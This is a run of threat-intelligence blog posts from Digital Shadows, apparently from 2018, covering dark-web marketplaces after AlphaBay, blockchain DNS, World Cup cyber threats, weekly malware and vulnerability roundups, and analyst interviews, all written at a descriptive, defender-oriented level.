A: From a research and public intelligence perspective, being able to understand and translate the goals, motives and modus operandi of threat actors can be very useful to organizations trying to mitigate risks within their business. If you can recognize what an attacker’s objectives are, you are then better placed to identify which of your systems are most at risk. Knowing how threat actors – be it organized cybercriminal groups, nation states or individual hackers – operate means you can systematically develop of a model of their behaviour, much like a playbook of their tactics, techniques and procedures. From here you can then identify what critical assets you need to secure, and draw up a defensive security controls checklist that you can apply directly to your environment so these weak points don’t exist. We refer to this as threat modelling.

The other benefit of this type of approach is that organizations often struggle to picture themselves from an attacker’s perspective. A business may be compromised for its own assets – to steal its sensitive data or disrupt its critical systems – but it may also become a secondary victim if its assets can help an attacker reach their primary target. For example, a smaller organization may assume that it is of no interest to a large cybercriminal outfit or sophisticated attacker, but in reality, these attackers may look to the organization’s infrastructure as a staging post or pivot point to achieve their loftier objectives.


Q: What are some of the challenges working in the security research space?

A: Cutting through a lot of the noise in this space and providing insight that is relevant and operationally empathetic isn’t easy, but this is one of the guiding missions for the work that we do at Digital Shadows. In my area specifically, there are a lot of exaggerations and idealized concepts when it comes to what makes “useful intelligence”. Take Common Vulnerabilities and Exposures (CVEs) and patching as an example. Lots of CVEs are being created and reported, but the difficulty for organizations lies in how to prioritize what you patch. There’s an emerging common wisdom that discussions of CVEs on underground forums and chat channels are a good indicator of what vulnerabilities are the most significant and in need of attention. The reality though is that most of these conversations are by individuals who lack the capability to ever exploit a vulnerability, and they are merely sharing news articles between them the same way we do as colleagues in the office. Activity on the dark web and criminal underground generates headlines and looks impressive, but it shouldn’t be the only place researchers look to for their data.

Instead, organizations and their security teams are much better off prioritizing patches of vulnerabilities that are actually being exploited in the wild, not just discussed online. In particular, the focus should be on vulnerabilities that allow for remote code execution and local privilege escalation against ubiquitous applications such as Office, web browsers, content management systems and operating system kernels. Simplifying and narrowing the focus for security teams means they can divert their resources to the right problems. This should be the aim for anyone serious about producing quality security research, but of course, that’s easier said than done.


Interested in hearing more from our intelligence team? Check out our blog, our Security Analyst Spotlight Series, or subscribe to our weekly threat intelligence podcast: ShadowTalk.



Rafael joined Digital Shadows in 2015 and works as a Senior Strategy and Research Analyst. He has written several articles and papers, and his research regularly features in the international press. His previous research areas include threats to the 2016 Rio Olympics, the 2017 WannaCry attacks, and how organisations and individuals can combat the spread of disinformation and fake news. Alongside Michael Marriott, he co-hosts and produces the Digital Shadows podcast, Shadow Talk. Rafael has a background in International Relations and Political Economy. See his blog posts here

How Cybercriminals are using Blockchain DNS: From the Market to the Bazar Tue, 12 Jun 2018 15:28:14 +0000 Since the takedowns of AlphaBay and Hansa in 2017, the cybercriminal community has been incorporating alternative technologies to improve both security and trust for those conducting illicit business online. Our latest report, Seize and Desist: The State of Cybercrime in the Post-AlphaBay and Hansa Age, looks at what technologies and processes have been the most popular. In this blog, we focus on one in particular, the use of blockchain DNS, which has seen steady, but not explosive, growth among cybercriminal users.  

What is Blockchain DNS?

Traditionally, when we type a website into an Internet browser, a computer will query a DNS server for an IP address. Essentially, this is the Internet equivalent of a phone book. For example, if we search for digitalshadows[.]com, the computer will perform a look up against a DNS server for the corresponding IP address, The final part of the domain (.com, .de, .uk, .org) is known as a Top Level Domain (TLD) and is controlled by a central authority such as Internet Corporation for Assigned Names and Numbers (ICANN), Nominet or DENIC.

Blockchain DNS, on the other hand, is an example of a decentralized DNS. Blockchain TLDs – including .bit, .bazar and .coin – are not owned by a single central authority. DNS lookup tables are shared over a peer-to-peer network and use a different technology from traditional DNS requests.

Decentralized DNS offers many benefits such as countering censorship by authorities (for example if a government orders all Internet Service Providers in a country to stop redirecting domains to a relevant IP address), or preventing DNS spoofing, where attackers can insert corrupt DNS data so that the name server returns an incorrect IP address and redirects traffic to an attacker computer. However, decentralized DNS can also be abused by attackers for malicious purposes.   

Experimenting with Decentralized DNS: Securing Your Stash

In July 2017, the Joker’s Stash, a popular Automated Vending Cart (AVC) site used to purchase stolen payment card details, began using blockchain DNS alongside its established Tor (.onion) domain. Users wanting to access the .bazar version of the site need to install a blockchain DNS browser extension or add-on.

  Jokers Stash bazar domain

Figure 1: Joker’s Stash .bazar domain

AVCs and other sites used to trade stolen account information have been experimenting with peer-to-peer DNS technology in order to hide malicious activity and, crucially, bullet-proof their platforms. Jokers’ Stash was not the first to experiment with decentralized DNS, a group known as The Money Team also created a .bazar domain back in January 2016, again in an attempt to better secure their operations. As blockchain domains do not have a central authority and registrations contain unique encrypted hashes rather than an individual’s name and address, it is harder for law enforcement to perform site takedowns. 

OpenBazaar and Decentralized Marketplaces

Blockchain technology has also allowed users to realize alternative models for online marketplaces. The site known as Tralfamadore, for example, uses blockchain as its back-end to store the necessary databases and code to support front-end user interfaces. Transactions are made using cryptocurrency and recorded as smart contracts on the blockchain. This theoretically improves trust among users of the site as all transactions are permanently recorded, meaning that scam vendors can be more easily identified.

Another marketplace using blockchain technology is the site OpenBazaar. This project began in April 2016 and its userbase has increased steadily since then. In the first half of 2018, the number of new users on the site has risen by roughly 4,000, while the items for sale have gone up from 18,000 to over 27,000. Despite these gains, OpenBazaar has not been used for cybercriminal activity to any great extent, and the majority of items listed on the site would not be classed as illicit.

OpenBazaar user and items

Figure 2: Number of OpenBazaar user and items since late-January 2018

Overall, support for decentralized marketplaces are in a nascent stage, but several barriers are still holding back its wider adoption among the cybercriminal community. Primarily, the issue of with blockchain-based platforms is that all interactions are publicly recorded, complicating private messaging between users. Users prefer to use more secure instant messaging services such as Jabber, which explains why cybercriminals in the post-AlphaBay and Hansa age have reverted to specialized forums where they can interact with buyers and sellers over Jabber, or directly on Telegram and Discord channels used to advertise everything from compromised accounts, stolen payment cards to counterfeit goods. The next blog in this series will look at these messaging platforms in greater depth.

If you can’t wait until then, download our report Seize and Desist: The State of Cybercrime in the Post-AlphaBay and Hansa Age to find out more on how cybercriminals are shifting away from the marketplace model towards alternative channels.


To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

Shadow Talk Update – 06.11.2018 Mon, 11 Jun 2018 19:11:18 +0000 In Shadow Talk this week, Dr Richard Gold joins us to discuss the issue of security debt, a term used to refer to the accumulation of security risks over time, such as missed patches, misapplied configurations, mismanaged user accounts. Richard looks into how many of the attacks we see on a regular basis are actually a result of security risks that build up over time, and how security debt is a ticking time bomb for most organizations. In Part II, Harrison Van Riper covers the recent website defacement attack and data breach incident targeting the event ticketing company, Ticketfly.


Data breach and website defacement rock Ticketfly

Event ticketing company Ticketfly took all operations offline pending investigation into a website defacement attack and reported data breach. Ticketfly confirmed the data, which had been uploaded to a public server, was legitimate. The threat actor claiming responsibility has previously been associated with a hacktivist group known for conducting ideologically motivated defacement attacks. However, the attack on Ticketfly appears to be financially motivated since the attacker reportedly demanded payment from Ticketfly in return for disclosure of details regarding the exploitable vulnerability.


Group 123 target South Korean Naver users with new RAT variant

Distribution of new remote access trojan (RAT) variant, NavRAT, has been attributed to the North Korean threat group known as Group 123.  The group sent South Korean users phishing emails that referenced the upcoming United States–North Korea summit and contained a Hangul Word Processor document featuring malicious macros. Group 123 used the Naver email platform to communicate with its infrastructure and exfiltrate data. Although abusing such legitimate email platforms for this purpose is not a new tactic, this is the first observed campaign to use the popular Naver platform.


RIG exploit kit incorporates new remote code execution flaw

The RIG exploit kit has recently incorporated CVE-2018-8174, a vulnerability affecting VBScript. The vulnerability was originally identified as a “zero day” exploit named Double Kill, with exploitation in the wild attributed to the espionage threat group Dark Hotel. RIG’s quick incorporation of this vulnerability exemplifies threat actors’ rapid uptake of exploits enabling remote code execution, favored due to their increased ability to compromise networks and devices. The exploitation was likely enabled by the release of proof of concept code recently on GitHub for the flaw. A patch has been released to address this vulnerability.


North Korean threat group ceases attacks on United States energy sector

Covellite, an alleged North Korean threat group attributed with targeting entities in the energy sector, has reportedly ceased attacks against United States–based targets. While the reason for this was unconfirmed, the timing coincides with the United States and North Korean governments’ efforts to improve geopolitical relations. Covellite is a credible threat to the energy sector: it has continued to attack entities in other regions, including Europe and East Asia, and more attacks are considered likely in the short- to mid-term future (next six months).

Security debt resources:


To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

Threats to the 2018 Football World Cup: Traditional Rules or a New Style of Play? Thu, 07 Jun 2018 16:47:12 +0000 The tension and excitement that precedes all global sporting events is beginning to build towards the start of this year’s Football World Cup in Russia. Levels of expectation will vary between nations, teams and fans alike; however, those concerned with the cyber-related risks surrounding sporting events may need to consider altering their defensive tactics.

Typical Cyber Threats to International Sporting Events

If trends throughout recent major sporting events are to tell us anything, it is that we should expect to see an array of offensive cyber activity during the World Cup this June. The attacks seen at this year’s 2018 Winter Games in PyeongChang fit the mold for activity previously witnessed across sport’s biggest stages. Threats typical to international sporting events include:

  • Phishing sites. Tournament email lures are often used to trick victims into interacting with malicious emails. For instance, fake lottery win notifications and tickets were combined with counterfeit partner websites to harvest credentials and scam football fans in the buildup to the event. Here, phishing sites and emails that were impersonating FIFA played a key role.

Attackers can also register domains impersonating the tournament brand or sponsors and use these to send phishing emails. Organizations and consumers should, therefore, look out for email addresses and websites that mimic official brands. For example, Digital Shadows detected the following domains that did not belong to official organizers of the event: tbc-russia2018[.]ru, welcome2018[.]info, welcome2018[.]co, ioc2018[.]com and welcome2018[.]cn. Although not currently associated with a particular campaign, as many of these domains had mail exchanger (MX) records, it was possible that they could be used in future in phishing attacks to distribute malware or harvest credentials.

  • Hacktivist campaigns. Online activists, often with a political agenda, coordinate targeted attacks such as denial of service (DoS), website defacements and data leaks against the host nation and sponsors. Examples include OpSochi and OpOlympicHacking, two campaigns conducted by the Anonymous hacktivist group that targeted the Winter Olympics in Sochi and the Rio Summer Games respectively. The long-running OpRussia campaign has yet to target entities associated with the World Cup, but participants could realistically use the event as a platform to further protest against government censorship.


Figure 1: OpRussia defacement claim against Russian telecommunications company from May 2018

  • Disruptive malware – Seen most recently in PyeongChang earlier this year, the ‘Olympic Destroyer’ malware, for example, sought to impede the opening ceremony.
  • Attacks on public Wi-fi users – Tourists and high-value individuals have previously been targeted when traveling by attackers who take advantage of insecure public Wi-Fi connections. The suspected Russian state group, APT-28, used credentials stolen from Wi-Fi networks in hotels to deliver remote access malware to steal information and allow for lateral movement across networks. According to Kaspersky, over a fifth of Wi-Fi hotspots in 2018 World Cup cities were using unreliable networks.
  • Fraud and financial crime – Previous major sporting events have seen a variety of tactics that exploit the large number of tourists that visit host cities. These include ATM skimming, banking scams and infections against point of sale malware used to steal payment card information.

The motivations for targeting the event are clearly unlikely to change in Russia with large crowds and extensive media coverage offering similar rewards to those aiming for disruption or financial gain.

Changing Threat Landscape – New Style of Play

By and large, the traditional offensive techniques seen at previous sporting occasions have been focused on disrupting the event or profiting from those in attendance. The increasing use of Internet-connected technology throughout sport, however, could change the threat landscape in future. Advances in this area have undoubtedly expanded the opportunities available to athletes and spectators, but have also opened new avenues for risk. The result is a maturity of the threat landscape that can potentially damage the integrity of sport and add to spectator, sponsor and athlete safety concerns.

Sport in the Technology Era

Sport’s reliance on ‘smart’ technologies has increased year on year. Now we see the expansion of the ‘Internet of Things’ (IoT) stretch across areas such as athlete performance, spectator experience and the optimization of venue infrastructure. Data can be shared and accessed through IoT devices more easily with the use of smart watches and tablets used by players and coaches; the same technology can now enhance a viewer’s experience through the provision of live stats and player tracking; and stadiums now use ‘connected’ systems to provide suitable sporting environments that aid lighting, temperature and recovery facilities. The appeal of ‘smart’ stadiums’ has likely gone hand in hand with the growing demand for greater profits and prestige for the nations and sponsors that host the biggest sporting events, the implementation of which is only set to continue in the future.

At the turn of the year stadiums in Russia were reportedly being subject to the employment of ‘smart’ technology in order to keep with trending infrastructure at major sporting events. The extent to which these stadiums will be vulnerable as a result of these technologies is somewhat unpredictable, but the risks are certainly present. Concerns are rightly raised around sports facilities and stadia, especially those related to the fire safety and access control functions that form a part of the ‘connected’ infrastructure we often see at global events.

While we are yet to see attacks against critical safety systems in a major sporting tournament, the reality is not completely far-fetched; if an aspiring threat group had the chance to manipulate these systems there is a realistic possibility that they would if it furthered their aims and objectives. If these type of attacks aren’t realized just now, then they will become more likely as these smart stadiums become the norm in the future.

Bringing the Game Into Disrepute

The process of scoring, judging and reviewing decisions is another aspect of competitive sport that could be threatened via new attack vectors provided by the IoT. Central to the success of a World Cup or Olympic games is the integrity of the results, which can often rely on the use of video replays or precise timing systems. This year’s tournament will be the first to make use of Video Assistant Referees (VAR), a procedure that has come under scrutiny during its trials across various leagues and competitions. Football already produces some of the most controversial sporting situations meaning that any interruption to the use of VAR, or any of the referee’s decisions, would likely have significant consequences for the integrity of the game and its reputation worldwide.

In Summary

Overall, this new style of play is likely to affect events of the future and would come as a something of a surprise to those present in Russia this year. Traditional activity, such as phishing sites and World Cup associated fraud, has already begun. If we are to see any activity exploiting IoT vulnerabilities, it is likely to be small in scale and less sophisticated; however, we can’t rule out the possibility that threat actors will use this year’s event to test their capabilities.

The 2020 Olympic Games in Tokyo is set to be one of the most ‘connected’ sporting events, utilizing smart systems throughout stadiums, public transport and the various sports that are to be played. While we may not yet see highly sophisticated attacks directed at these systems in Russia this year, their vulnerabilities may not go unexploited for too long into the future. The on-going opportunities supplied by these technologies are likely to be coupled by a variety of new risks that could endanger any industry that employs their use. Sport will not be exempt from this.


To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

]]> Heir to the AlphaBay and Hansa throne? Mon, 04 Jun 2018 20:20:26 +0000 It’s almost one year since the AlphaBay and Hansa dark web marketplace takedowns, also known as Operation Bayonet. Looking back, no single marketplace has managed to fill the AlphaBay-shaped gap left behind, at least among the English-speaking community. Existing sites such as Dream and Trade Route have failed to consolidate this empty space, hampered by a combination of poor communication by administrators and suspicion that these sites could be police honeypots like Hansa had been. Our latest report, Seize and Desist: The State of Cybercrime in the Post-AlphaBay and Hansa Age, looks at how the criminal ecosystem has developed.

This broad sense of fear and mistrust has also stymied new marketplaces. Without a strong reputation new sites often struggle to get off the ground. And when they do, maintaining that trust and standing is difficult to achieve. We recently blogged on the rapid rise and fall of the Olympus marketplace, which tarnished a growing reputation in seconds after its administrator provoked the ire of its customer base by “hacking” a reddit-style online community called Dread.    

Introducing Marketplace 

One alternative that has been patiently developing in the background is market[.]ms, a marketplace run by founders of the prestigious Exploit[.]in hacking forum. Market[.]ms has been in development since 2015, and the current beta mode has a relatively small userbase (451 members and 79 items for sale according to the latest count).



Figure 1: market[.]ms homepage as it appears to registered users


Despite not being fully-developed, there are several reasons why this particular marketplace has better chances of succeeding than those that have gone before: 

  1. Street cred – Marketplaces live and die by their reputation, and Exploit[.]in holds good standing among both the Russian- and English-speaking cybercriminal communities. The site operates strict vetting and access restrictions, adding a greater sense of legitimacy for the goods and services being sold, and also easing some concerns regarding law enforcement operatives posing as normal users.
  2. Deep pockets – As well as overcoming trust issues, new markets have financial obstacles they need to hurdle. Setting up a new marketplace comes with a variety of hidden costs (a more in-depth discussion of the barriers to entry for new marketplaces will follow in a future blog) that include web development, bulletproof hosting services, bug bounty programs and customer support capabilities. As a well-established and highly popular forum, Exploit[.]in is in a stronger position than most to devote the necessary experience and financial resources to maintain a successful marketplace.
  3. Security and trust focused – Given the climate of fear and uncertainty, the developers of market[.]ms have gone to great lengths to demonstrate their dedication to security and privacy for their users. The site has a dedicated FAQ page for its security features, which includes providing “maximum anonymity”, using “encrypted servers”, carrying out “constant security tests” and “only [requiring] minimum data from users”. The site describes itself an “automated safe trading platform”, providing the opportunity for “anyone” to buy and sell on a site with a built-in guarantor using Bitcoin. Funds can allegedly easily be withdrawn from the system, there is a guarantee that goods will be paid for, buyers can challenge low-quality goods and will receive instant receipt or delivery of goods.

In a move that is being mirrored by many other forums, market[.]ms also has its own dedicated customer support and official Telegram channels. This is a trend that we’ve noticed more broadly across the criminal ecosystem, with users retreating from the marketplace model in favor of specialized forums operating chat channels on communication networks such as Telegram, Discord and Jabber.


Figure 2: Market[.]ms Telegram channel


  1. Cautious advertising – As well as taking steps to make their site more secure, the brains behind market[.]ms are also taking a guarded approach to online advertising. Rather than marketing the site as far and wide as possible – and potentially soliciting unwanted attention – the only publicly available references to the marketplace at this time are a post on Exploit[.]in with links to the site and a Pastebin page advertising the platform.
  2. Don’t do drugs kids – One of the main reasons why AlphaBay and Hansa became high-priority targets for law enforcement was the sale of illegal substances on the site, particularly fentanyl, which was associated with a large number of deaths worldwide. Market[.]ms, on the other hand, specifically focuses on digital goods such as databases, compromised accounts, malware, exploits, and counterfeit documents. The site also offers services such as VPN access, socks and proxies. While the sale of these goods will still be of concern to law enforcement, it’s likely that market[.]ms will be less of a priority for takedown operations in comparison to sites selling more high-profile items such as narcotics, weapons and abusive content.


Figure 3: Goods and services offered on market[.]ms Success does not come overnight

While the creators of market[.]ms may be well-placed to succeed, that the site has been in development since 2015 and is still only in beta mode demonstrates how creating and sustaining a prosperous marketplace is a task that takes time and can’t be rushed.  

In our latest research report, Seize and Desist: The State of Cybercrime in the Post-AlphaBay and Hansa Age, we look at the impact that the AlphaBay and Hansa marketplaces have had on the criminal ecosystem. One year on, it appears as if the marketplace model is in decline, at least for the time being, with cybercriminals turning to alternative platforms and technologies to continue their operations. Market[.]ms may buck this trend, but in the post-AlphaBay age sites have to tread carefully in terms of not being too overt with their advertising, making it clear how they protect their users, while still facilitating enough transactions to remain financially viable.


To find out more on how cybercriminals are acclimatizing to this new environment, download our report: Seize and Desist: The State of Cybercrime in the Post-AlphaBay and Hansa Age.

Shadow Talk Update – 06.04.2018 Mon, 04 Jun 2018 14:12:25 +0000 In this week’s Shadow Talk, Dr Richard Gold joins us to discuss the return of the L0pht hackers. In 1998 the L0pht members delivered a cybersecurity hearing to the United States Senate, warning that any one person in their group could take down the Internet within 30 minutes. 20 years on, we look back on what has and hasn’t changed in the world of information security. In Part II, the team covers recent reporting on the use of military-style tactics such as war gaming and intelligence fusion centers in the financial services industry. We ask whether such tactics are effective, and whether smaller organizations can also employ the techniques being used by some of the world’s largest enterprises.


BackSwap malware switches bank transfer recipient

BackSwap deployed browser manipulation techniques against Microsoft Windows-operating machines to target Polish online banking users. The malware was delivered in spam campaigns with the “Nemucod” downloader attached, simulating modified legitimate applications. Once installed, the malware used innovative techniques to identify user browsing information and specific banking transfers by using event hooks in the Windows message loop. A malicious JavaScript file was then injected into the URL address field, then swapped intended transfer recipient details for those of attacker-controlled accounts. The technique works across multiple browsers, and bypasses browser protection mechanisms. The campaign remains active, and BackSwap’s methods will likely be adapted by other banking malware developers.


Canadian banks’ customer data allegedly stolen

In two instances that are likely linked, threat actors reportedly informed the Bank of Montreal and Canadian Imperial Bank of Commerce subsidiary Simplii that they had obtained customer data through an undisclosed method. The legitimacy of the claims could not be independently verified, but statements from the affected banks suggested that the attackers had obtained credible data for up to 90,000 individuals. Some media outlets reportedly received notice of extortion demands against the financial institutions, although the banks did not confirm receiving such demands and they may have been sent to the press by an unrelated, opportunistic threat actor. At the time of writing, any information on TTPs used in any associated breach is unknown, as is the date of any breach that may have occurred.


Chilean bank services disrupted by virus

Banco de Chile confirmed that an undisclosed virus had affected the bank’s networks on 24 May 2018. Reportedly, malware had infected workstations and other assets, thereby disrupting branch and telephone services. Social media posts, apparently made by Banco de Chile customers, also indicated service interruptions to Web platforms, and possible social engineering activity, such as phishing scams. However, the bank stated that customer accounts and transaction security had not been compromised. There have been no details of any TTPs reported, but, given Banco de Chile’s statements, the malware appeared to be disruptive, and could have been used to obscure other malicious activity. It is highly likely that more reporting will emerge in the short to medium term (one week to three months).


US-CERT reveals current Lazarus Group activity

The United States Computer Emergency Readiness Team (US-CERT) released an advisory detailing “HIDDEN COBRA” (aka Lazarus Group) malware that has reportedly been used since 2009. The advisory described “Joanap” (a backdoor trojan) and “Brambul” (a Server Message Block worm), which have been previously associated with the same threat group. US-CERT also highlighted new and ongoing activity associated with the group, including targeted sectors and geographies.

7 Ways The Digital Risk Revolution Changes Risk and Compliance – Webinar Key Insights Wed, 30 May 2018 15:13:35 +0000 Lockpath’s Vice President of Development Tony Rock and I recently conducted a webinar titled “7 Ways the Digital Risk Revolution Changes Risk and Compliance”. Tony is a cyber resiliency advocate who helps organizations assess breakthrough technologies and foster a culture of innovation while protecting intellectual property and managing enterprise risk. If you’re not familiar with Lockpath, their Keylight Platform integrates business processes to simplify risk management and regulatory compliance challenges. In this webinar, we discussed the digital risk trends and real-world enterprise challenges that create serious impacts from a governance, risk and compliance (GRC) perspective. Increased exposure points, things to protect, sophisticated attacks and regulations all create the perfect storm for digital risks and cyber threats.

The world is investing in digital technologies to access more innovative business models, making them more profitable, efficient or effective. This new digital domain, however, features new types of risks that didn’t exist before. Historically enterprises build castle walls around their valuable “crown jewels” be that customer PII (personally identifiable information), intellectual property or critical business operations. This perimeter has dissolved in the digital-by-default era. Organizations have supply chains that are more complex and longer than before, meaning we’re hyper-connected with more data that resides outside our company walls with limited visibility and less control. These gaps pose consequences to revenue, brand reputation and customer loyalty. You need fresh approaches to risk and compliance to understand and adapt to emerging cyber threats.

A few highlights from our webinar include:

1. Recognize Risks Beyond the Perimeter: The de-perimeterization of business due to mobile, cloud computing and an extended supply chain helps multiply risks outside of your organization. Digital risks include cyber threats, data exposure, brand exposure, third party risk, VIP exposure, physical threats and infrastructure exposure. Traditional perimeter-focused security solutions can’t comprehensively address these risks because the boundaries have disappeared. Protecting partner, customer and employee data is more difficult today. This greater attack surface poses challenges for organizations facing a shortage of security staff and skills in IT and security. This requires holistic approaches that consider people, processes and technology to increase visibility and compliance effectiveness.

2. Adopt Integrated Risk Management: Evolving into a digital business has truly transformed the business opportunity and competitiveness of many organizations. But organizations operate in silos and often lack communication and coordination. This accelerates enterprise risk and compliance gaps, to say nothing of wasted staff resources and time. I believe that all businesses are becoming digital enterprises with their “digital footprints” extending online into social media, the cloud and even the dark web. Integrated Risk Management (IRM) overcomes these organizational silos and takes a more holistic approach as Gartner’s John A. Wheeler states in his blog on “Seven Ways to Engage the Board on IRM”. The benefits of Integrated Risk Management include improved risk management and decreased time spent on governance and compliance.

3. Learn from Real-World Digital Risk Examples: Executives often ask how the exposures and breaches they read about in the media take place. I shared several scenarios during the webinar that outline how digital risks have negatively impacted organizations. The last World Cup match illustrates how Digital Shadows used digital monitoring to detect threats leading up to the global event. We monitor for digital footprints, the information that is projected, shared and created online by an organization. Attackers have digital footprints too that are detected for insight and context on cyber threats.

Digital Risk examples

If you turn this perspective to data loss, recent research in our white paper “Too Much Information” outlines how misconfigured cloud storage leaves 1.5 Billion files exposed globally on the Internet that threat actors could then exploit. Early detection of incidents reduces the cost to remediate.

4. Communicate the Importance of Digital Risk: Organizations that have historically been unaware of their digital risks now realize that they can no longer ignore them. There is real world evidence and case studies where financial and reputational damage has led to serious outcomes for organizations. Enhanced visibility and focus also help organizations allocate limited resources and better align security to organizational goals. Tony shared that an organization’s risk culture and security maturity can influence their likelihood to incorporate digital risk indicators into their operational processes. While adopting new technologies can pose digital risk management (DRM) challenges, security and information professionals can become more agile and adapt to the technology landscape and evolving cyber threat preparedness. As the Harvard Business Review states in “Boards Should Take Responsibility for Cybersecurity. Here’s How to Do It” (Curry, 2017):

Ideally, boards should eliminate obstacles that prevent organizations from developing a culture of proactive security. Without strong support from executive management and the board, companies are unlikely to develop strong cybersecurity practices. Directors should make sure that OpEx and CapEx are aligned with risk reduction priorities and projects; security is not done for security’s sake. It’s done for the business.

I’ve also seen that Integrated Risk Management is now being elevated as a board of directors-level initiative to establish cross-entity communication and resource investment. This welcomed executive involvement ensures a more strategic approach to risk management and security for all industry sectors, not just the highly regulated ones.

You can watch the webinar “7 Ways the Digital Risk Revolution Changes Risk and Compliance” to learn more about emerging threats and best practices to keep your business and reputation intact, reduce compliance complexity and mitigate digital risk going forward. Cyber security professionals must be responsive to the demands of agile digital-first businesses that lead our thriving economy.


To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

Shadow Talk Update – 05.29.2018 Tue, 29 May 2018 17:49:21 +0000 The focus in this week’s Shadow Talk is on “VPNFilter”, a modular malware with disruptive functionalities has targeted more than 500,000 network infrastructure devices across 54 countries. Recently the malware has been particularly active targeting Ukraine. The team also cover new research on the TRITON malware targeting industrial control systems, changing techniques used by the Roaming Mantis malware family, and vulnerability updates related to VBScript and the Spectre/Meltdown attacks.


VPNFilter malware infects 500,000 devices

The multi-stage, modular malware VPNFilter has been associated with more than 500,000 infections on “small office home office” (SOHO) routers and network-attached storage (NAS) in 54 countries. Active since at least 2016, the malware has showed spikes in activity targeting Ukraine in May 2018. Initial entry is likely accomplished through default credentials and known vulnerabilities. The malware included robust persistence and command and control (C2) mechanisms, plug-ins for C2 communication and traffic sniffing, as well as a “kill” function that can render a device inoperable. The FBI has since seized control of one C2 domain; however, it is a realistic possibility that attackers continue to control some non-rebooted devices. The activity was associated with Russia-linked threat group “APT-28”, although this was not independently confirmed. Users should reboot and reset routers, as well as apply available patches.


XENOTIME threat actor attributed to TRISIS malware 

Security company Dragos published details of a threat actor named XENOTIME, which has been linked to attacks against industrial control systems (ICS). The group was associated with the TRISIS/TRITON malware, which targeted critical national infrastructure with disruptive intent. The group, currently active and operational since 2014, has expanded targeting from the Middle East to other geographies, including the United States. XENOTIME demonstrates in-depth knowledge of ICS, including those outside of the Schneider Electric Triconex system targeted by TRISIS malware. The group’s tactics, techniques and procedures (TTPs) included watering hole attacks, credential capture and reuse, and command line tools for lateral movement. The shift in target geography likely reflects updated operational objectives, and as this group is likely state-backed, activity will likely be influenced by inter-state political relationships.


Roaming Mantis malware family updates TTPs

The “Roaming Mantis” (aka Xloader, MoqHao) malware family has updated TTPs, as well as additional target geographies. The malware’s developers had previously only deployed Android malware to capture banking credentials, first using SMS message phishing and then DNS spoofing to socially engineer victims to download malicious files. The financially motivated group has continued to use DNS re-directions in attempts to deliver Android malware, Apple phishing pages and cryptocurrency mining scripts using host pages in an additional 23 languages. It was not known how the group compromised DNS servers, but default credentials, brute-force cracking attacks or vulnerability exploitation could enable DNS device access.


Proof of concept (PoC) exploit codes published for VBScript vulnerability

Two working PoC exploit codes for CVE-2018-8174 were published to GitHub on 21 and 22 May 2018. This vulnerability affects VBScript scripting language, and can enable remote code execution if targeted through Internet Explorer. It was reportedly previously exploited in attacks attributed to the “DarkHotel” espionage group, and the recent release of public exploit code will likely result in widespread additional targeting. Although this vulnerability could be exploited through drive-by download attacks, it is more likely that attackers will use Word documents to deliver exploits, because a malicious Word file can force Internet Explorer to run and access the exploit code regardless of any default browser settings. Users should apply patches released by Microsoft.


Additional Spectre/Meltdown microprocessor vulnerabilities reported

On 21 May 2018 several sources published details on two additional speculative execution side-channel microprocessor vulnerabilities related to the widely reported Spectre and Meltdown PoC attacks. The vulnerabilities affected Intel, Arm and AMD products, and were tracked as CVE-2018-3640 (Variant 3A) and CVE-2018-3639 (Variant 4). Exploitation could allow attackers access to sensitive data. CVE-2018-3639 is a new vulnerability subclass titled Speculative Store Bypass. No attacks were observed in the wild targeting either vulnerability, or the original Spectre/Meltdown vulnerabilities. Some limited exploit code was published, but would likely require significant development for successful exploitation. Given the complexity of targeting these vulnerabilities, threat groups are likely to continue using less-complex attack vectors. Mitigation advisories were published by several companies, with more information expected over the coming weeks.


Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

Security Analyst Spotlight Series: Rose Bernard Wed, 23 May 2018 15:09:59 +0000 Organizations rely on our cyber intelligence analysts to be an extension of their security team. Our global team of analysts provide relevant threat research, much needed context, tailored remediation advice and managed takedown support to make our clients’ jobs easier and more efficient. Crucially, by having analysts within the intelligence and collection cycle, we’re able to minimize the real-time false positives that cause nightmares for most organizations.

In our Security Analyst Spotlight Series, we bring our analysts out of the shadows and into the spotlight, showcasing their expertise and interests so you can learn a bit more about a “day-in-the-life” of a Digital Shadows Intelligence analyst.

Name: Rose Bernard
Team: Strategic Intelligence
Title: Strategic Intelligence Manager

Q: How did you get into cybersecurity?

A: Before working in cybersecurity I was working in an investigational role, primarily focusing on international counter-narcotics. At the time, the nexus between cyber investigations and cybersecurity strategy was still developing, and so getting involved in it meant that as a relatively junior member of staff I was able to cover a lot of really interesting and complex operational and geopolitical cases I wouldn’t have had the opportunity to otherwise. I was given a lot of freedom and independence to conduct research and create actionable plans, which I really enjoyed.

From there, it was a natural step to take the skills that I’d learnt in an operational context and apply them to cybersecurity research, primarily looking at the deep and dark web. Cybersecurity for me has always been this really interesting space that merges the more traditional geopolitical concepts of power and politics, with this really chaotic space where other threat actors can completely upturn the balance of power.


Q: How have your past experiences prepared you for your role? 

A: Career-wise I’m lucky enough to have worked in a whole spectrum of different roles, so I’ve been able to get a really good understanding of the wider context surrounding cyber incidents. I’ve worked with a wide variety of different people in different countries, so I’ve really been able to soak up a lot of knowledge about things that I wouldn’t necessarily have if I’d stayed on one track. Independent research has always been a big part of my academic career, which has really helped me develop analysis skills. I speak a wide range of languages, including Spanish, French, Italian, German and Portuguese, which is incredibly helpful given the international nature of cybercrime.


Q: What do you do outside work that helps with your job?

A: I’m currently studying for my PhD, where I’m creating a framework for civilian and military organizations to share intelligence and information in pandemics and Public Health Events of International Concern (PHEICs). The practice of independent research is really strengthening my skills, as is the focus on original and critical thought. I’m also learning a lot about the functions of intelligence frameworks, which is helping me provide context to my work at Digital Shadows.


Q: What advice would you give someone wanting to become an intelligence analyst?

A: Get curious. You don’t need to have an academic background in a really niche area to be an analyst (you don’t really need an academic background at all). A lot of the technical skills can be learnt on the job. What you do need is excellent research skills, and to want to join the dots to make sense out of something that might seem unconnected.

Also, get used to hard work, and be prepared to speak up. At times intelligence analysis can be a real slog of just gathering as much information as you can before you start the actual analysis process. And when all that’s done, don’t be afraid to draw conclusions and to have opinions. You’ll have to back them up, but original thinking is one of the most important qualities in intelligence analysis.

